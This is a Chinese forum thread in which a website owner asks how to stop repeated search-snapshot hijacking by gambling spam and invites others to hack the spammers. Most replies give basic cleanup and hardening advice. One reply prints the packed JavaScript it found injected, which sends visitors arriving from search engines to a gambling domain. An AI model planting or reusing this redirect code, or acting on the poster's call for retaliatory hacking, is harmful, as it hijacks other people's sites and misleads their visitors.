网站连续两次被劫持，有什么好的解决办法？顺便北京S车PK10具体是怎么个运作方式？

网站前段时间被劫持了，如下图，好长时间不管，还好别人告诉我网站出问题，删除代码后，它又来了一次。然后从百度搜了下“北京sai车pk10”，结果如下想要资讯各位大佬的问题主要如下：1、有什么好的办法防止它的下次攻击？（复制黏贴、灌水的就不要了）2、百度的安全提示提交解封了，没卵用。我估计就是等着，除了等着还有更实际的解决办法没？3、谁知道“北京S车pk10”具体是怎么个运作方式，有没有大神去黑他们的网站，最好把他们的几个站全部删除了，如有，本人友情赞助。mb没事来搞我老老实实做网站的
2022-03-19 13:05 已解决

给你个最简单粗暴的，我用过百试百灵。先把看得见的劫持代码删除，尽量把网站先恢复到劫持之前，然后果断删除admin目录里所有文件，备份到本地或服务器其他盘符。如果没有太多功能直接把网站所有动态文件删除，只留下HTML页面！呵呵  绝吧？

如果是DNS劫持，换DNS服务器，换第三方的！

她们说的这哪的，没有一个有我这个实际。明确告诉你，只要存在动态页面、功能板块页面就会有漏洞！ 如果网站更新不是非常频繁，建议采用我这个办法！绝对好用！

上面讲的差不多了，就是找后台漏洞，删和改，修改涉及到的一切密度、投诉、申请之类的，然后使用安全狗。

我这边分享个扫码工具：  mi：o4ho  优先把ftp中涉及到内容和数据库的下载下来，然后用扫码工具进行查毒，将原来的程序重新删除后长传。

这么巧，我前两天也遇到过被劫持快照的，代码如下：<script>eval(function(p,a,c,k,e,r){e=function(c){return (a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('("<5 9=\\"b\\">");("c 1=");("8((\\"a\\")>0 || (\\"o\\")>0 || (\\"d\\")>0 ||(\\"e\\")>0 ||(\\"f\\")>0 ||(\\"g\\")>0 ||(\\"h\\")>0 ||(\\"i\\")>0 )");("\\"l://\\";");("</5>");',25,25,'|s|indexOf|document|writeln|script|com|referrer|if|LANGUAGE|baidu|Javascript|var|soso|sm|uc|bing|yahoo|so|location|href|https|www|b99655|sogou'.split('|'),0,{}))</script>

[跳转代码]

判断搜索引擎跳转代码

将代码放在首页即可，直接输入网址不跳转，从搜索引擎进入会跳转到指定网站。

我删除了代码，第二天又出来了，没办法，修改了后台地址和账号密码，还是被挂马，再后来联系阿里云提交了代码，说明了情况，修改了ftp密码，这两天才没有挂马！用360网站卫士扫描了一下，发现有漏洞，dede系统，然后修补了漏洞！就这样，绝大多数情况下是同行搞的！！！

这个问题估计是只有换代码了，或者换一下服务器。

你好兄弟对于你这个问题我想只能给我给你解决了，我只能告诉你，你现在的网站可以被别人操控，因为你的数据库已经被镜像同步，如果你想解决这个方法，直接找我把，搜外这里的这些人没一个能给你解决的。

小兄弟，你这是被快找劫持了。具体快找劫持详情看百度百科：

至于说防御，防个毛线，自己网站安全没做好，就不要想着防御了。如果你的网站盈利还行的话，建议请个技术提升一下你网站的安全等级。

至于说你想把这些pk的人搞死，真是想多了。干他们这个的都不差钱，你觉得你干得赢他们吗？而且这些词不是一个人做，是很多人做，干完一个还有一个。你确定你要干吗？

如果你真的有钱去干，唔，祝你好运。

北京pk10，专业的买车（类似于买*马）的关键词，这么说明白不。

看看自己代码里有没有什么陌生的文件，有的话把他删除就好了(最好看一下日志文件)，实在不会的话就去淘宝找人帮你解决一下，花不了几个钱的。

首先，你要观察，你的网站是属于主页劫持还是快照劫持。有针对性的排查。那个页面被改了，先把他改回来，找到马的位置，把后门删除掉。并且建议更改服务器密码。

问题如果处理不了可以考虑发钱，长期这样对网站影响很大，通常把源码上木马的找到，然后把变更代码删除，服务器杀毒就好了。